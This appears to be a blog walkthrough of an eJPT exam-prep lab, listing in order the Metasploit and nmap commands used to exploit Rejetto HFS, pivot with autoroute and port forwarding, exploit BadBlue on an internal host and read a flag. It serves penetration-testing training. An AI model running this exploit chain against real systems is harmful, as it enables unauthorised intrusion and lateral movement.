Exploit and Chill

>Slidin' in the DMZ

Contact

Pivoting & PORT FORWARDING – ejpt exam PREPARATION (ine)

command: “ping -c 4 demo1.ine.local”Checks if the target machine is reachable via ICMP. command: “nmap demo1.ine.local”Performs a basic scan to discover open ports on the target machine. command: “nmap -sV -p80 demo1.ine.local”Performs service version detection on port 80 to identify the running service. command: “searchsploit hfs”Searches for known exploits related…

+

+

+

+

+

+

command: "ping -c 4 demo1.ine.local"
Checks if the target machine is reachable via ICMP.

command: "nmap demo1.ine.local"
Performs a basic scan to discover open ports on the target machine.

command: "nmap -sV -p80 demo1.ine.local"
Performs service version detection on port 80 to identify the running service.

command: "searchsploit hfs"
Searches for known exploits related to ‘hfs’ using the local exploit database.

command: "msfconsole"
Starts the Metasploit Framework console.

command: "use exploit/windows/http/rejetto_hfs_exec"
Loads the Rejetto HFS exploit module in Metasploit.

command: "set RHOSTS demo1.ine.local"
Sets the target IP address for the exploit module.

command: "exploit"
Runs the exploit, which should give a Meterpreter shell on the target.

command: "ipconfig"
Shows the IP configuration of the compromised system to identify network details.

command: "run autoroute -s 10.0.16.0/20"
Adds a route inside Meterpreter to enable pivoting into the internal network.

command: "background"
Sends the Meterpreter session to the background so we can use other modules.

command: "use auxiliary/scanner/portscan/tcp"
Loads the TCP port scanner module in Metasploit.

command: "use auxiliary/scanner/discovery/arp_scanner"
Loads the ARP scanner module in Metasploit, used for discovering live hosts on the internal network through pivot.

command: "set RHOSTS demo2.ine.local"
Sets the target to the internal machine (victim machine 2).

command: "set PORTS 1-100"
Specifies the port range to scan (1 to 100).

command: "exploit"
Runs the port scan to discover open ports on the internal machine.

command: "sessions -i 1"
Returns to the existing Meterpreter session.

command: "portfwd add -l 1234 -p 80 -r demo2.ine.local"
Forwards the remote port 80 of victim 2 to local port 1234 on the attacker machine.

command: "portfwd list"
Lists active port forwarding rules to confirm it’s set up correctly.

command: "nmap -sV -sS -p 1234 localhost"
Scans the locally forwarded port to identify the running service on the internal host (BadBlue).

command: "searchsploit badblue 2.7"
Searches for known exploits targeting BadBlue 2.7.

command: "use exploit/windows/http/badblue_passthru"
Loads the BadBlue PassThru exploit module.

command: "set PAYLOAD windows/meterpreter/bind_tcp"
Sets the payload to use bind TCP (target listens, attacker connects).

command: "set RHOSTS demo2.ine.local"
Sets the target IP for the BadBlue exploit.

command: "exploit"
Executes the exploit, aiming to get a Meterpreter shell on victim 2.

command: "shell"
Switches from Meterpreter to a normal command shell on the target.

command: "cd /"
Navigates to the root directory.

command: "dir"
Lists files and directories in the current path.

command: "type flag.txt"
Displays the contents of ‘flag.txt’, revealing the flag.

+

+

+

+

+

+

+

+

+

+

+

+

+

+

+

+

+

+

Leave a comment